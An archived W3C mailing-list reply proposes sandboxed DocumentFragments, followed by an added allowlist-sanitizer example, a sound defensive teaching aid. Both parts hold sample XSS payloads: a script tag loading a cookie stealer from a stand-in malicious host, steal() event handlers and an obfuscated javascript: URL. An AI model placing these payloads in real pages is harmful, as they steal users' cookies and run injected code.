
Re: innerHTML in DocumentFragment

From: Ryan Seddon <seddon.ryan@gmail.com>
Date: Tue, 8 Nov 2011 15:23:50 +1100
Message-ID: <CADsa-VeLNtd_vkOvnnhvQqwg7g0BuMAxT7Ne8Kp50gOUP5CXow@mail.gmail.com>
To: Ojan Vafai <ojan@chromium.org>
Cc: Yehuda Katz <wycats@gmail.com>, public-webapps WG <public-webapps@w3.org>
On Tue, Nov 8, 2011 at 4:30 AM, Ojan Vafai <ojan@chromium.org> wrote:

> I don't really follow. Script won't execute until you append the fragment
> to the DOM, at which point the fragment itself doesn't go in the DOM, just
> its children. So, I'm not really sure what sandboxing on fragments would
> do.

If I were ajaxing in potentially hostile content that had malicious script
tags in it, it would be ideal to "sandbox" the content so the HTML parser in
the browser would strip the content for me.

// the hostile response body (single-quoted so the inner double quotes are valid JS)
xhr.responseText = '<div><script src="//malicious.site/cookieStealer.js"></script><h1>content</h1></div>';

var frag = document.createDocumentFragment();

frag.sandbox = ""; // proposed property, not something fragments have today
frag.innerHTML = xhr.responseText; // it's sandboxed so the script(s) will be stripped by the parser.

document.body.appendChild(frag);

The following article demonstrates the same concept using an iframe with
the sandbox attribute set[1]. To me, it would also make sense to extend
this to fragments.

[1]
http://community.jboss.org/people/wesleyhales/blog/2011/08/28/fixing-ajax-on-mobile-devices

-Ryan
Received on Tuesday, 8 November 2011 04:24:48 GMT
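
An added example, not code from Ryan's message or from any W3C work: what code that wants the effect described above (parse untrusted HTML, keep the markup, lose the scripts) has to do with the APIs browsers actually ship. The `frag.sandbox` property in the message is a proposal and does not exist. Two caveats drive the design: setting `innerHTML` on an element does not execute `<script>` elements, but inline handlers such as `<img onerror>` still fire once the nodes are in the document, and `Range.createContextualFragment` goes further and marks scripts as executable; a `DOMParser` document, by contrast, is inert. So the example parses with `DOMParser`, walks the parsed tree, and rebuilds only allowlisted elements and attributes as fresh nodes. The sanitizer itself works on a minimal plain-object tree so it can be exercised offline on a constructed input; `fromDom()`, `toDomFragment()` and `safeFragmentFromHtml()` are the browser adapters. The tag and attribute allowlists are an assumed policy, not a standard, and the sample payload is constructed to mirror the one in the message.

```javascript
// Added example (not from the original thread): allowlist sanitization of an
// already-parsed HTML tree, the safe analogue of the "sandboxed fragment" idea.
// Policy below is an assumption for illustration, not a standard list.

const ALLOWED_TAGS = new Set(["div", "span", "p", "h1", "h2", "h3", "ul", "ol",
  "li", "a", "img", "b", "i", "em", "strong", "br"]);
// Elements whose content goes away with the element itself.
const DROP_WITH_CONTENT = new Set(["script", "style", "iframe", "object",
  "embed", "template", "noscript", "svg", "math"]);
const ALLOWED_ATTRS = { "*": ["class", "title", "alt"], a: ["href"], img: ["src"] };
const URL_ATTRS = new Set(["href", "src"]);

// Browsers drop ASCII whitespace/control characters while parsing a URL scheme,
// so "java\tscript:" is javascript:. Mirror that before checking the scheme.
// Attribute values arriving from a parsed tree are already entity-decoded.
function safeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  if (!m) return true;                       // relative URL, fragment, or no scheme
  return m[1] === "http" || m[1] === "https" || m[1] === "mailto";
}

// Tree shape: {type:"element", name, attrs:{}, children:[]} | {type:"text", text}.
function sanitizeNode(node) {
  if (node.type === "text") return [{ type: "text", text: node.text }];
  if (node.type !== "element") return [];    // comments, PIs, anything else
  const name = node.name.toLowerCase();
  if (DROP_WITH_CONTENT.has(name)) return []; // the <script> from the message dies here
  const children = node.children.flatMap(sanitizeNode);
  if (!ALLOWED_TAGS.has(name)) return children; // unknown wrapper: keep content, drop tag
  const allowed = ALLOWED_ATTRS["*"].concat(ALLOWED_ATTRS[name] || []);
  const attrs = {};
  for (const [k, v] of Object.entries(node.attrs)) {
    const key = k.toLowerCase();
    if (!allowed.includes(key)) continue;          // drops every on* handler, style, etc.
    if (URL_ATTRS.has(key) && !safeUrl(v)) continue;
    attrs[key] = v;
  }
  return [{ type: "element", name, attrs, children }];
}
function sanitizeTree(nodes) { return nodes.flatMap(sanitizeNode); }

// Serializer for inspection and tests. In a browser, do not re-parse this string
// with innerHTML (that reopens mutation-XSS issues); build nodes with toDomFragment.
const esc = (s) => s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
  .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
const VOID = new Set(["img", "br"]);
function serialize(nodes) {
  return nodes.map((n) => {
    if (n.type === "text") return esc(n.text);
    const a = Object.entries(n.attrs).map(([k, v]) => ` ${k}="${esc(v)}"`).join("");
    return VOID.has(n.name) ? `<${n.name}${a}>` : `<${n.name}${a}>${serialize(n.children)}</${n.name}>`;
  }).join("");
}

// Browser adapters (not exercised offline). fromDom() reads a DOMParser tree, where
// scripts never ran; toDomFragment() creates fresh nodes, so no object from the
// untrusted parse tree, not even an allowed element, reaches the live document.
function fromDom(domNode) {
  if (domNode.nodeType === 3) return { type: "text", text: domNode.data };
  if (domNode.nodeType !== 1) return { type: "other" };
  const attrs = {};
  for (const at of domNode.attributes) attrs[at.name] = at.value;
  return { type: "element", name: domNode.localName, attrs,
           children: Array.from(domNode.childNodes).map(fromDom) };
}
function toDomFragment(nodes, doc) {
  const frag = doc.createDocumentFragment();
  for (const n of nodes) {
    if (n.type === "text") { frag.appendChild(doc.createTextNode(n.text)); continue; }
    const el = doc.createElement(n.name);
    for (const [k, v] of Object.entries(n.attrs)) el.setAttribute(k, v);
    el.appendChild(toDomFragment(n.children, doc));
    frag.appendChild(el);
  }
  return frag;
}
function safeFragmentFromHtml(html) {           // browser entry point
  const parsed = new DOMParser().parseFromString(html, "text/html");
  return toDomFragment(sanitizeTree([fromDom(parsed.body)]), document);
}

// Constructed sample: the message's payload plus the cases innerHTML alone would
// NOT neutralise (inline handlers, a javascript: URL), as a parser would yield it.
const HOSTILE_TREE = [{
  type: "element", name: "div", attrs: {}, children: [
    { type: "element", name: "script", attrs: { src: "//malicious.site/cookieStealer.js" }, children: [] },
    { type: "element", name: "h1", attrs: { onclick: "steal()" }, children: [{ type: "text", text: "content" }] },
    { type: "element", name: "a", attrs: { href: "java\tscript:alert(1)" }, children: [{ type: "text", text: "link" }] },
    { type: "element", name: "img", attrs: { src: "/logo.png", onerror: "steal()" }, children: [] },
  ],
}];
function demo() { return serialize(sanitizeTree(HOSTILE_TREE)); }
console.log(demo()); // <div><h1>content</h1><a>link</a><img src="/logo.png"></div>
```

In a page, `document.body.appendChild(safeFragmentFromHtml(xhr.responseText))` is the whole call; everything the message wanted the parser to strip (the external script, plus the handler and URL cases it did not mention) is gone before any node touches the live document.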